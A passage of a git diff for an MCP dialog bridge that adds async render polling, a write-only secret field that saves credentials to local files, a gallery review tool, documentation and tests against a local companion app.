+            return {"written": True, "target": display, "bytes": len(value.encode())}
+        if mode == "substitute":
+            placeholder = target.get("placeholder")
+            if not placeholder or not isinstance(placeholder, str):
+                return fail(display, "substitute mode requires 'placeholder'")
+            existing = path.read_bytes().decode()  # raw bytes: no newline translation
+            count = existing.count(placeholder)
+            if count != 1:
+                why = "not found in target file" if count == 0 else f"found {count}× (must be exactly 1)"
+                return fail(display, f"placeholder '{placeholder}' {why}")
+            updated = existing.replace(placeholder, value, 1).encode()
+            atomic_write(path, updated)
+            return {"written": True, "target": display, "bytes": len(updated)}
+        return fail(display, f"unknown mode '{mode}'")
+    except (OSError, UnicodeError) as e:
+        return fail(display, str(e) if isinstance(e, OSError) else "value or target file is not valid UTF-8")
+
+
+def _apply_target_writes(spec: dict[str, Any], data: dict[str, Any]) -> None:
+    """Run the local file write for every `target` field of `spec` and replace
+    that field's entry in `data["result"]["values"]` with the outcome: the
+    outcome alone for `secret` fields (raw value dropped so it never reaches
+    the agent), `{"value": ..., **outcome}` otherwise. Does nothing when the
+    dialog was cancelled or no field has a target. Mutates `data` in place.
+    """
+    targets = [] if data.get("cancelled") else _collect_target_fields(spec)
+    if not targets:
+        return
+    # Create the result/values containers when the reply did not include them.
+    values = data.setdefault("result", {}).setdefault("values", {})
+    for field in targets:
+        name = field["name"]
+        submitted = values.get(name)
+        text = str(submitted) if submitted is not None else ""
+        outcome = _write_local_target(text, field["target"])
+        # Secret fields are write-only: only the outcome goes back.
+        is_secret = field.get("kind") == "secret"
+        values[name] = outcome if is_secret else {"value": submitted, **outcome}
+
+
+async def _wait_for_aiui() -> None:
+    """Poll the unauthenticated `/ping` until the companion answers 200 or
+    `COLDSTART_WAIT_S` elapses (Step 3, parity with the Rust bridge).
+
+    Gives a cold companion (Claude Desktop just launched, SSH tunnel just came
+    up) time to start serving before the first render. Never raises on
+    timeout: the caller falls through to `_preflight`, which produces the
+    precise reachability diagnosis. `/ping` is cheap and needs no token.
+    """
+    deadline = time.monotonic() + COLDSTART_WAIT_S
+    async with httpx.AsyncClient(timeout=2.0) as client:
+        while time.monotonic() < deadline:
+            try:
+                r = await client.get(f"{ENDPOINT}/ping")
+                if r.status_code == 200:
+                    return
+            except httpx.HTTPError:
+                pass  # not up yet — keep polling within the budget
+            # Pause between probes, but never sleep past the deadline.
+            await asyncio.sleep(min(0.5, max(0.0, deadline - time.monotonic())))
+
+
+async def _poll_render(
+    client: httpx.AsyncClient,
+    render_id: str,
+    ctx: Context | None,
+) -> dict[str, Any]:
+    """Repeat `GET /render/{id}` until the reply is no longer `{pending: true}`
+    and return that terminal JSON body (Step 3 async render).
+
+    Each GET carries the bearer token and is bounded by `ASYNC_POLL_TIMEOUT_S`
+    (meant to exceed the server's ~25 s poll window), so no single connection
+    is held for the user's think-time. After each pending reply the running
+    count of pending replies is reported as MCP progress through `ctx`, when
+    given, so the client (Claude Code) knows the tool is alive, not hung.
+
+    Raises `RuntimeError` on 404, else whatever `raise_for_status()` raises.
+    """
+    url = f"{ENDPOINT}/render/{render_id}"
+    pending_polls = 0
+    while True:
+        reply = await client.get(
+            url, headers={"Authorization": f"Bearer {_token()}"}, timeout=ASYNC_POLL_TIMEOUT_S
+        )
+        if reply.status_code == 404:
+            raise RuntimeError(
+                f"aiui lost track of render {render_id} (expired or never "
+                f"registered). Restart the dialog."
+            )
+        reply.raise_for_status()
+        body = reply.json()
+        if body.get("pending") is not True:
+            return body
+        pending_polls += 1
+        if ctx is None:
+            continue
+        try:
+            # Best-effort: a missing progressToken or any reporting hiccup
+            # must never break the render.
+            await ctx.report_progress(progress=float(pending_polls), total=None)
+        except Exception as e:  # noqa: BLE001
+            log.debug("progress report skipped: %s", _explain_exc(e))
+
+
+def _session_origin() -> str:
+    """Host name of this bridge's machine, attached to every render as
+    `session_origin` (Step 4, I8) so the user sees which host a dialog came
+    from; falls back to "remote" when the host name cannot be read."""
+    try:
+        origin = socket.gethostname()
+    except OSError:
+        origin = "remote"
+    return origin
+
+
+async def _post_render(
+    spec: dict[str, Any],
+    ctx: Context | None = None,
+    session: str | None = None,
+) -> dict[str, Any]:
+    await _wait_for_aiui()
     await _preflight()
     t0 = datetime.now(timezone.utc)
     log.info("render → kind=%s", spec.get("kind"))
-    # Resolve any absolute / `~/`-rooted file paths *before* shipping
-    # the spec down the HTTP wire. This bridge runs on the same host
-    # as the agent — local for Mac use, remote for SSH-tunneled
-    # remotes — so this is the only point in the chain where the
-    # agent's filesystem actually exists. The Mac-side server resolver
-    # only handles HTTPS.
-    _resolve_local_paths(spec)
     async with httpx.AsyncClient(timeout=TIMEOUT_S) as client:
+        # Video first: push local video files to the Mac's /media cache and
+        # swap their `src` for the returned playback URL — BEFORE the image
+        # inliner runs, so it never tries to base64 a huge clip.
+        await _upload_local_videos(spec, client)
+        # Resolve any absolute / `~/`-rooted file paths *before* shipping
+        # the spec down the HTTP wire. This bridge runs on the same host
+        # as the agent — local for Mac use, remote for SSH-tunneled
+        # remotes — so this is the only point in the chain where the
+        # agent's filesystem actually exists. The Mac-side server resolver
+        # only handles HTTPS.
+        _resolve_local_paths(spec)
+        # Async render (Step 3): opt in via the header. A current companion
+        # registers the dialog and answers immediately with `{id, ttl_secs}`
+        # (202); we then poll for the result. An older companion ignores the
+        # header and answers synchronously (200 with the terminal shape) — we
+        # detect that and use it directly (backward-compatible).
         r = await client.post(
             f"{ENDPOINT}/render",
-            headers={"Authorization": f"Bearer {_token()}"},
-            json={"spec": spec},
+            headers={"Authorization": f"Bearer {_token()}", "x-aiui-async": "1"},
+            json={
+                "spec": spec,
+                "session": session,
+                "session_origin": _session_origin(),
+            },
         )
         r.raise_for_status()
+        first = r.json()
+        if r.status_code == 202:
+            render_id = first.get("id")
+            if not render_id:
+                raise RuntimeError("async /render: 202 response missing `id`")
+            data = await _poll_render(client, render_id, ctx)
+        else:
+            data = first  # synchronous companion — terminal result already
+    # Issue #135: this bridge runs ON the agent's host, so `target` fields are
+    # written here as LOCAL file operations (the value arrived over the :7777
+    # channel, never via the agent). Secret values are written and stripped
+    # before the result is handed to the agent.
+    _apply_target_writes(spec, data)
     dt = (datetime.now(timezone.utc) - t0).total_seconds()
-    data = r.json()
     log.info(
         "render ← kind=%s cancelled=%s took=%.2fs",
         spec.get("kind"), data.get("cancelled"), dt,
@@ -308,6 +681,8 @@ async def ask(
     header: str | None = None,
     multi_select: bool = False,
     allow_other: bool = True,
+    session: str | None = None,
+    ctx: Context | None = None,
 ) -> dict[str, Any]:
     """Before listing options in chat and waiting for the user to type back
     which one (deploy strategy, migration path, file to act on …), call
@@ -347,7 +722,7 @@ async def ask(
         "multiSelect": multi_select,
         "allowOther": allow_other,
     }
-    return _format_result(await _post_render(spec))
+    return _format_result(await _post_render(spec, ctx, session))
 
 
 @mcp.tool()
@@ -360,6 +735,11 @@ async def form(
     actions: list[dict[str, Any]] | None = None,
     submit_label: str | None = None,
     cancel_label: str | None = None,
+    size: str | None = None,
+    width: float | None = None,
+    height: float | None = None,
+    session: str | None = None,
+    ctx: Context | None = None,
 ) -> dict[str, Any]:
     """Whenever the user needs to provide ≥ 2 related inputs, or any single
     input that doesn't belong in chat (secret, date/datetime/range,
@@ -395,6 +775,8 @@ async def form(
     FIELD KINDS:
     - text:        {kind, name, label, placeholder?, default?, multiline?, required?}
     - password:    {kind, name, label, placeholder?, required?}  — masked on screen only; value returns as plaintext in the response. Use for short-lived secrets; direct users to keychain/env for long-lived ones.
+    - secret:      {kind, name, label, placeholder?, required?, target}  — masked input whose value is written to a file and NEVER returned to you (#135). Pair with `target` (see below). Use when the user must supply a credential that should not enter this conversation at all.
+    - FILE-WRITE / `target` (any input field): add `target` to write the entered value to a file ON THE HOST YOU RUN ON when the user submits (the affirmative button is the per-write approval; the user sees the path first). Shape: `{"mode": "create"|"substitute", "path": "~/.github_tokens/byte5ai", "perm"?: "0600", "overwrite"?: bool, "placeholder"?: str}`. `create` writes the raw value (needs `overwrite:true` to clobber an existing file); `substitute` replaces a `placeholder` occurring exactly once in an existing file (format-agnostic: YAML/TOML/INI/…); choose a DISTINCTIVE sentinel that can't collide with real content (e.g. `__AIUI_SECRET_GITHUB_PAT__`, not a common word) — if it occurs 0 or >1 times the write is refused with an error, never misapplied. For a `secret` field the value is write-only (result: `{written, target, bytes}` — no value); a non-secret field with `target` is written AND returned. Destination is always your own host: the aiui module on that host (this bridge for your session) writes it as a LOCAL file operation, so `create` and `substitute` both work identically whether you run locally or on a remote SSH host — a foreign host cannot be targeted. Errors: `{written:false, error}`.
     - number:      {kind, name, label, default?, min?, max?, step?, required?}
     - select:      {kind, name, label, options: [{label, value}], default?, required?}
     - checkbox:    {kind, name, label, default?}
@@ -440,6 +822,16 @@ async def form(
             Without actions, defaults to Cancel + Submit.
         submit_label: Legacy fallback for the default submit button label.
         cancel_label: Legacy fallback for the default cancel button label.
+        size: Starting window size hint — "s", "m", or "l". aiui picks good
+            local defaults and clamps to the screen. The window is always
+            resizable; this only sets the *initial* size and never opens
+            smaller than the content needs. Use "m"/"l" for forms with
+            images, tables, wireframes, or many fields so they don't open
+            cramped.
+        width: Explicit starting width in logical px (overrides `size`).
+            Rarely needed — prefer `size`.
+        height: Explicit starting height in logical px (overrides `size`).
+            Rarely needed — prefer `size`.
     """
     spec = {
         "kind": "form",
@@ -451,8 +843,11 @@ async def form(
         "actions": actions,
         "submitLabel": submit_label,
         "cancelLabel": cancel_label,
+        "size": size,
+        "width": width,
+        "height": height,
     }
-    return _format_result(await _post_render(spec))
+    return _format_result(await _post_render(spec, ctx, session))
 
 
 @mcp.tool()
@@ -464,6 +859,8 @@ async def confirm(
     confirm_label: str | None = None,
     cancel_label: str | None = None,
     image: dict[str, Any] | None = None,
+    session: str | None = None,
+    ctx: Context | None = None,
 ) -> dict[str, Any]:
     """Before writing any yes/no question into chat, call this tool instead.
     Pass `destructive=True` (red button) for delete / drop / force-push /
@@ -507,7 +904,86 @@ async def confirm(
         "cancelLabel": cancel_label,
         "image": image,
     }
-    return _format_result(await _post_render(spec))
+    return _format_result(await _post_render(spec, ctx, session))
+
+
+@mcp.tool()
+async def gallery(
+    items: list[dict[str, Any]],
+    title: str | None = None,
+    description: str | None = None,
+    header: str | None = None,
+    actions: list[dict[str, Any]] | None = None,
+    comment: bool = False,
+    columns: int | None = None,
+    submit_label: str | None = None,
+    cancel_label: str | None = None,
+    size: str | None = None,
+    width: float | None = None,
+    height: float | None = None,
+    session: str | None = None,
+    ctx: Context | None = None,
+) -> dict[str, Any]:
+    """Batch visual review: show several images and/or videos at once and
+    collect a per-item decision (+ optional comment) in ONE window, instead
+    of calling `confirm` once per asset.
+
+    WHEN TO USE: "review these N generated images", "triage this batch of
+    screenshots", "approve/revise/skip each of these renders". For a single
+    image sign-off use `confirm` with `image`; for a one-of-N choice use
+    `ask` with thumbnails.
+
+    Each item needs a stable `value` (the key you get the decision back
+    under) and usually a `src`. `src` follows the standard aiui resolution
+    rules (data: URL, http(s) URL, or absolute / `~/` local path on YOUR
+    host). Videos are detected by `data:video/` MIME or a
+    .mp4/.mov/.m4v/.webm extension and render with native controls.
+
+    Per-item buttons come from `actions` (default Approve / Revise / Skip).
+    Set `comment=True` for a free-text field per item.
+
+    Returns `{cancelled, decisions}` where `decisions` maps each touched
+    item's `value` to `{decision, comment?}`. Items the user didn't touch
+    are omitted.
+
+    Args:
+        items: List of `{value, src?, alt?, label?, detail?, max_height?}`.
+            `value` must be non-empty and unique. Order is preserved.
+        title: What the user is reviewing, e.g. "Review 6 hero renders".
+        description: One sentence of context under the title.
+        header: Chip above the title (≤ 14 chars).
+        actions: Per-item decision buttons as
+            `[{label, value, primary?, success?, destructive?}]`. Defaults
+            to Approve (green) / Revise / Skip.
+        comment: Show a free-text comment field per item.
+        columns: Grid columns. Omit for responsive auto-fill.
+        submit_label: Footer submit button label.
+        cancel_label: Footer cancel button label.
+        size: Starting window size hint — "s", "m", or "l". Defaults to
+            auto-sizing by item count; pass "l" for a large batch or tall
+            thumbnails so the grid opens roomy. Always resizable; never opens
+            smaller than the content needs.
+        width: Explicit starting width in logical px (overrides `size`).
+        height: Explicit starting height in logical px (overrides `size`).
+        session: Short human label for this session, shown in the window
+            chrome so parallel dialogs stay distinguishable.
+    """
+    spec = {
+        "kind": "gallery",
+        "title": title,
+        "description": description,
+        "header": header,
+        "items": items,
+        "actions": actions,
+        "comment": comment,
+        "columns": columns,
+        "submitLabel": submit_label,
+        "cancelLabel": cancel_label,
+        "size": size,
+        "width": width,
+        "height": height,
+    }
+    return _format_result(await _post_render(spec, ctx, session))
 
 
 @mcp.prompt(name="teach")
diff --git a/python/src/aiui_mcp/skill.md b/python/src/aiui_mcp/skill.md
index 0198278..5483d54 100644
--- a/python/src/aiui_mcp/skill.md
+++ b/python/src/aiui_mcp/skill.md
@@ -51,6 +51,7 @@ Skip the dialog for content the user reads, doesn't answer:
 | Yes/no, especially destructive | `confirm` |
 | 2–6 options, possibly with per-option context | `ask` |
 | Multi-field input, multi-action footer | `form` |
+| Per-item verdict on a *batch* of images/videos ("approve/revise/skip each") | `gallery` |
 | Single free-text answer | just ask in chat |
 | More than 8 fields | split into multiple `form` calls; do not cram one dialog |
 
@@ -174,6 +175,41 @@ For "pick one (or more) of these N generated images" — logo variants,
 thumbnail candidates, asset triage. Spec: `images: [{value, src, label?}]`,
 `multi_select?`, `columns?` (default 3). Result: `{selected: [values]}`.
 
+`image_grid` *picks* among candidates. For a **separate verdict per item**
+(approve this, revise that, skip the third, optional note each) use the
+`gallery` tool below instead.
+
+## Batch review: `gallery`
+
+A standalone tool (not a `form` field) for reviewing a *batch* of images
+and/or videos and collecting one decision per item in a single window —
+instead of firing `confirm` once per asset.
+
+Spec: `items: [{value, src?, alt?, label?, detail?, max_height?}]`,
+`actions?` (per-item buttons, default Approve / Revise / Skip),
+`comment?` (free-text per item), `columns?`. Each item's `value` must be
+non-empty and unique — it keys the result. `src` follows the standard
+image rules; **videos** (a `data:video/` URL, or an `http(s)://` URL or local
+path ending in `.mp4`/`.mov`/`.m4v`/`.webm`) render with native controls. Local
+videos of any size work — the bridge pushes them to aiui's media cache on
+the Mac and the dialog streams them back, so a remote clip plays without
+hosting it anywhere.
+
+Result: `{cancelled, decisions: {"<value>": {decision, comment?}}}`. Only
+touched items appear — an untouched item means "no verdict", not a default.
+
+## Starting window size: `size`
+
+`form` and `gallery` take an optional `size` hint — `"s"`, `"m"`, `"l"` —
+and aiui picks good local defaults, clamped to the screen. (Explicit
+`width`/`height` in logical px override it; rarely needed.) The hint is a
+**floor**: the window opens at `max(content-estimate, hint)`, so it never
+opens smaller than the content needs, but a sparse dialog can be told to
+start roomy. Windows are always resizable — but many users don't realise
+that, so opening at a comfortable size is what separates "polished" from
+"looks broken". Use `"m"`/`"l"` for forms with images/tables/wireframes/many
+fields, or galleries with a large batch; leave unset for short forms.
+
 ## `datetime` field
 
 Lückenfüller between `date` and `date_range`. Cron, scheduling, reminders —
@@ -202,8 +238,36 @@ recordings or to a shoulder-surfer.
 
 Be honest with the user, though — the value still returns to you as
 plaintext in the tool response. For long-lived or high-value secrets,
-tell the user to put them in their keychain or an env var and reference
-them by name instead.
+use the `secret` field with a `target` (below) so the value never enters
+the conversation.
+
+## Secrets & file-write: `secret` field + `target` (#135)
+
+When a value must NOT pass through this conversation — a credential the
+user pastes that should land in a file, not your transcript — use a
+`secret` field with a `target`. Any input field may carry `target`; for a
+`secret` field the value is **write-only** (result: `{written, target,
+bytes}`, never the value).
+
+```json
+{ "kind": "secret", "name": "pat", "label": "GitHub PAT für byte5ai",
+  "target": { "mode": "create", "path": "~/.github_tokens/byte5ai",
+              "perm": "0600", "overwrite": true } }
+```
+
+- `mode:"create"` — write raw value (needs `overwrite:true` to clobber).
+- `mode:"substitute"` — replace a `placeholder` occurring exactly once in
+  an existing file (YAML/TOML/INI/env); 0 or >1 → error (never misapplied).
+  Pick a **distinctive sentinel** (`__AIUI_SECRET_GITHUB_PAT__`, not a common
+  word) so the single match is unambiguous, not just lucky.
+- Destination is always your own host: the aiui module there (native app
+  locally, bridge on a remote SSH host) writes it as a LOCAL file op, so
+  `create` and `substitute` both work identically local and remote — no
+  foreign host. The user sees the path and approves by submitting. Errors:
+  `{written:false, error}`.
+
+Replaces the fragile "guess a shell one-liner to stash a token" pattern.
+QoL + confused-deputy guard, not a hard guarantee.
 
 ## Anti-patterns (slop vs. clean)
 
diff --git a/python/tests/test_async_render.py b/python/tests/test_async_render.py
new file mode 100644
index 0000000..e818028
--- /dev/null
+++ b/python/tests/test_async_render.py
@@ -0,0 +1,139 @@
+"""Tests for the async-render client path (Step 3): the bridge POSTs, then
+polls `GET /render/{id}` until a terminal result, emitting progress on the way.
+"""
+from __future__ import annotations
+
+import asyncio
+from typing import Any
+
+import httpx
+import pytest
+
+import aiui_mcp.server as server
+from aiui_mcp.server import _poll_render, _wait_for_aiui
+
+
+class _FakeResp:
+    def __init__(self, payload: dict[str, Any], status: int = 200) -> None:
+        self._payload = payload
+        self.status_code = status
+
+    def raise_for_status(self) -> None:
+        return None  # no test drives the >=400 path through here
+
+    def json(self) -> dict[str, Any]:
+        return self._payload
+
+
+def _setup_token(monkeypatch: pytest.MonkeyPatch, tmp_path: Any) -> None:
+    token_file = tmp_path / "token"
+    token_file.write_text("dummy-token-for-tests")
+    monkeypatch.setattr(server, "TOKEN_PATH", token_file)
+
+
+def test_poll_render_returns_terminal_after_pending(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    seq = [
+        _FakeResp({"pending": True}),
+        _FakeResp({"pending": True}),
+        _FakeResp({"id": "x", "cancelled": False, "result": {"confirmed": True}}),
+    ]
+    calls = {"n": 0}
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        i = min(calls["n"], len(seq) - 1)
+        calls["n"] += 1
+        return seq[i]
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+
+    async def run() -> dict[str, Any]:
+        async with httpx.AsyncClient() as client:
+            return await _poll_render(client, "x", None)
+
+    data = asyncio.run(run())
+    assert data["cancelled"] is False
+    assert data["result"]["confirmed"] is True
+    assert calls["n"] == 3  # two pending polls, then the terminal one
+
+
+def test_poll_render_reports_progress_each_pending_iteration(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    seq = [_FakeResp({"pending": True}), _FakeResp({"id": "x", "cancelled": True})]
+    calls = {"n": 0}
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        i = min(calls["n"], len(seq) - 1)
+        calls["n"] += 1
+        return seq[i]
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+
+    class _Ctx:
+        def __init__(self) -> None:
+            self.ticks: list[float] = []
+
+        async def report_progress(
+            self, progress: float, total: Any = None, message: Any = None
+        ) -> None:
+            self.ticks.append(progress)
+
+    ctx = _Ctx()
+
+    async def run() -> dict[str, Any]:
+        async with httpx.AsyncClient() as client:
+            return await _poll_render(client, "x", ctx)  # type: ignore[arg-type]
+
+    data = asyncio.run(run())
+    assert data["cancelled"] is True
+    assert ctx.ticks == [1.0]  # one pending iteration → one progress tick
+
+
+def test_poll_render_raises_on_404(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"error": "unknown_render_id"}, status=404)
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+
+    async def run() -> dict[str, Any]:
+        async with httpx.AsyncClient() as client:
+            return await _poll_render(client, "gone", None)
+
+    with pytest.raises(RuntimeError) as exc_info:
+        asyncio.run(run())
+    assert "lost track" in str(exc_info.value)
+
+
+def test_wait_for_aiui_returns_when_ping_ok(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({}, status=200)
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    asyncio.run(_wait_for_aiui())  # returns promptly, no raise
+
+
+def test_wait_for_aiui_tolerates_unreachable_within_budget(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "COLDSTART_WAIT_S", 0.2)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        raise httpx.ConnectError("companion down")
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    # Must NOT raise — it falls through after the budget so _preflight can
+    # produce the precise diagnosis.
+    asyncio.run(_wait_for_aiui())
diff --git a/python/tests/test_integration_live.py b/python/tests/test_integration_live.py
new file mode 100644
index 0000000..867f7b5
--- /dev/null
+++ b/python/tests/test_integration_live.py
@@ -0,0 +1,168 @@
+"""Live integration smoke tests for the remote → companion HTTP path (harness
+Stufe 1).
+
+Unlike the unit tests, these talk to a REAL aiui companion over the real path
+(localhost:7777, i.e. through the SSH reverse-tunnel when run on a remote).
+They are strictly READ-ONLY — no `/render`, so no dialog windows pop on the
+user's Mac.
+
+Opt-in: skipped unless `AIUI_LIVE=1`, so the normal `pytest` run and CI never
+touch the network. When `AIUI_LIVE=1` is set but no companion is reachable,
+they SKIP with a message rather than failing (the opt-in may run where nothing
+is up).
+
+Run from the remote (or anywhere the tunnel reaches the companion):
+
+    AIUI_LIVE=1 uv run --extra dev pytest tests/test_integration_live.py -v
+
+Tolerant of companion version: assertions that target >=0.5.0 features
+(wire_version, the async `GET /render/{id}` route) degrade gracefully so the
+suite also passes against an older installed release.
+"""
+from __future__ import annotations
+
+import os
+from pathlib import Path
+
+import httpx
+import pytest
+
+ENDPOINT = os.environ.get("AIUI_ENDPOINT", "http://127.0.0.1:7777")
+TOKEN_PATH = Path(os.environ.get("AIUI_TOKEN_PATH", "~/.config/aiui/token")).expanduser()
+TIMEOUT = 6.0
+
+pytestmark = pytest.mark.skipif(
+    os.environ.get("AIUI_LIVE") != "1",
+    reason="live integration test — set AIUI_LIVE=1 with a running companion",
+)
+
+
+def _token() -> str:
+    return TOKEN_PATH.read_text().strip()
+
+
+def _auth() -> dict[str, str]:
+    return {"Authorization": f"Bearer {_token()}"}
+
+
+@pytest.fixture(scope="module", autouse=True)
+def _require_companion() -> None:
+    """Module-wide gate: skip (with a clear reason, never fail) when /ping is
+    unreachable or not 200, or when the token file does not exist."""
+    try:
+        ping = httpx.get(f"{ENDPOINT}/ping", timeout=TIMEOUT)
+    except Exception as exc:  # noqa: BLE001
+        pytest.skip(f"no companion reachable at {ENDPOINT}: {exc}")
+    if ping.status_code != 200:
+        pytest.skip(f"companion /ping returned {ping.status_code} at {ENDPOINT}")
+    if not TOKEN_PATH.exists():
+        pytest.skip(f"no aiui token at {TOKEN_PATH}")
+
+
+def test_ping_is_unauthenticated_pong() -> None:
+    resp = httpx.get(f"{ENDPOINT}/ping", timeout=TIMEOUT)
+    assert resp.status_code == 200
+    assert resp.text.strip() == "pong"
+
+
+def test_health_ready_shape() -> None:
+    """`/health` carries `version`, `ready` and the composite sub-objects."""
+    r = httpx.get(f"{ENDPOINT}/health", headers=_auth(), timeout=TIMEOUT)
+    assert r.status_code == 200
+    body = r.json()
+    # One assertion per key so that a failure names the missing field.
+    for k in ("version", "ready", "webview", "dialogs", "children"):
+        assert k in body, f"/health missing {k}"
+
+
+def test_version_shape() -> None:
+    resp = httpx.get(f"{ENDPOINT}/version", headers=_auth(), timeout=TIMEOUT)
+    assert resp.status_code == 200
+    payload = resp.json()
+    for field in ("version", "build_info", "binary_path", "updater_endpoint"):
+        assert field in payload, f"/version missing {field}"
+    # wire_version only ships with >=0.5.0 companions: check it when present.
+    if "wire_version" in payload:
+        assert isinstance(payload["wire_version"], int)
+
+
+def test_probe_self_shape() -> None:
+    resp = httpx.get(f"{ENDPOINT}/probe", headers=_auth(), timeout=TIMEOUT)
+    assert resp.status_code == 200
+    probe = resp.json()
+    assert probe.get("aiui") is True
+    assert {"pid", "build_sha"} <= probe.keys()
+
+
+def test_unauthorized_rejected() -> None:
+    """A wrong bearer token on `/health` must be answered with 401."""
+    bogus_auth = {"Authorization": "Bearer definitely-not-the-token"}
+    resp = httpx.get(
+        f"{ENDPOINT}/health", headers=bogus_auth, timeout=TIMEOUT
+    )
+    assert resp.status_code == 401
+
+
+def test_health_reports_lifecycle_phase() -> None:
+    """#137 lifecycle state machine: a >=0.8.0 companion exposes its current
+    phase in /health. Older companions that omit the field are skipped."""
+    resp = httpx.get(f"{ENDPOINT}/health", headers=_auth(), timeout=TIMEOUT)
+    assert resp.status_code == 200
+    health = resp.json()
+    if "lifecycle_phase" not in health:
+        pytest.skip("companion predates the lifecycle phase field (<0.8.0)")
+    phase = health["lifecycle_phase"]  # answering /health means past Starting
+    assert phase in ("Serving", "GracePending"), phase
+
+
+def test_media_route_exists_and_404s_for_unknown() -> None:
+    """#135/video media cache: GET /media/blob/<unknown> answers 404 (or 416),
+    never a 5xx. Read-only. A pre-media companion's route-miss 404 passes too."""
+    r = httpx.get(
+        f"{ENDPOINT}/media/blob/nonexistent-harness-probe.bin",
+        timeout=TIMEOUT,
+    )
+    # A route-miss on an older companion and a ServeDir "no such file" are
+    # both empty-body 404s, so they cannot be told apart from here: accept
+    # 404 either way as "no such file" and fail on anything else (notably a
+    # hard 5xx). No skip is attempted, because the old-companion case is not
+    # detectable from the response alone.
+    assert r.status_code in (404, 416), f"unexpected status {r.status_code}"
+
+
+def test_media_upload_requires_auth() -> None:
+    """An unauthenticated POST /media must get 401 — the media push is an
+    authenticated, mutating endpoint. Skipped when the route answers 404."""
+    resp = httpx.post(f"{ENDPOINT}/media?ext=mp4", content=b"x", timeout=TIMEOUT)
+    if resp.status_code == 404:
+        pytest.skip("companion has no /media endpoint (pre-0.7.0)")
+    assert resp.status_code == 401
+
+
+def test_render_get_unknown_id_route_exists_and_404s_cleanly() -> None:
+    """`GET /render/{id}` for a never-registered id must be served by the async
+    handler — 404 with body `unknown_render_id`. This deliberately asserts the
+    body, not just the status: an empty-body 404 means the *route itself* didn't
+    match (the axum 0.7 `:id` vs 0.8 `{id}` mismatch that shipped in the first
+    0.5.0 build and that a status-only check let through). Read-only — no dialog
+    is created.
+
+    Tolerant of an older companion with no such route: skip if the body is
+    empty AND status is 404/405 (route genuinely absent on that version)."""
+    r = httpx.get(
+        f"{ENDPOINT}/render/nonexistent-harness-probe-id",
+        headers=_auth(),
+        timeout=TIMEOUT,
+    )
+    body = r.text or ""
+    # Older companion without the async route: empty-body 404/405 → not this
+    # version's contract, skip rather than fail.
+    # NOTE(review): an empty-body 404 from the route-mismatch bug described
+    # above would be skipped here too, not failed — confirm that is intended.
+    if r.status_code in (404, 405) and not body.strip():
+        pytest.skip("companion has no async GET /render/{id} route (pre-0.5.0)")
+    assert r.status_code == 404
+    assert "unknown_render_id" in body, (
+        "GET /render/<id> must hit the async handler (body 'unknown_render_id'); "
+        f"empty 404 means the route didn't match. Got: {body!r}"
+    )
diff --git a/python/tests/test_resolve_local_paths.py b/python/tests/test_resolve_local_paths.py
index 665d4a7..dfead5c 100644
--- a/python/tests/test_resolve_local_paths.py
+++ b/python/tests/test_resolve_local_paths.py
@@ -14,8 +14,11 @@
 import pytest
 
 from aiui_mcp.server import (
+    _collect_local_videos,
+    _is_local_video,
     _looks_like_local_path,
     _read_path_as_data_url,
+    _replace_srcs,
     _resolve_local_paths,
 )
 
@@ -142,3 +145,63 @@ def test_resolve_local_paths_walks_confirm_image_and_ask_thumbnail(tmp_path: Pat
     assert ask_spec["options"][0]["thumbnail"].startswith("data:image/png;base64,")
     assert ask_spec["options"][1]["thumbnail"] == "https://leave.me/b.png"
     assert "thumbnail" not in ask_spec["options"][2]
+
+
+def test_resolve_local_paths_walks_gallery_items(tmp_path: Path) -> None:
+    """Gallery `items[].src` must resolve the same way — local image and
+    video paths inline as data:, remote/data URLs pass through.
+    """
+    img = tmp_path / "shot.png"
+    img.write_bytes(b"\x89PNG\r\n\x1a\nfake bytes")
+    vid = tmp_path / "clip.mp4"
+    vid.write_bytes(b"\x00\x00\x00\x18ftypmp42fake")
+
+    gallery_spec = {
+        "kind": "gallery",
+        "items": [
+            {"value": "a", "src": str(img)},
+            {"value": "b", "src": str(vid)},
+            {"value": "c", "src": "https://leave.me/c.png"},
+            {"value": "d", "src": "data:image/png;base64,UNCHANGED"},
+        ],
+    }
+    _resolve_local_paths(gallery_spec)
+    assert gallery_spec["items"][0]["src"].startswith("data:image/png;base64,")
+    assert gallery_spec["items"][1]["src"].startswith("data:video/mp4;base64,")
+    assert gallery_spec["items"][2]["src"] == "https://leave.me/c.png"
+    assert gallery_spec["items"][3]["src"] == "data:image/png;base64,UNCHANGED"
+
+
+def test_is_local_video_classifies_correctly() -> None:
+    assert _is_local_video("/Users/me/clip.mp4")
+    assert _is_local_video("~/Movies/take.MOV")
+    assert _is_local_video("/tmp/a.webm")
+    assert _is_local_video("/tmp/a.m4v")
+    assert not _is_local_video("https://x.test/clip.mp4")
+    assert not _is_local_video("data:video/mp4;base64,AAAA")
+    assert not _is_local_video("/Users/me/photo.png")
+    assert not _is_local_video("relative/clip.mp4")
+
+
+def test_collect_and_replace_local_videos_mirrors_rust() -> None:
+    spec = {
+        "kind": "gallery",
+        "items": [
+            {"value": "a", "src": "/Users/me/one.mp4"},
+            {"value": "b", "src": "https://x.test/two.mp4"},
+            {"value": "c", "src": "/Users/me/pic.png"},
+            {"value": "d", "thumbnail": "/Users/me/one.mp4"},
+        ],
+    }
+    found: list[str] = []
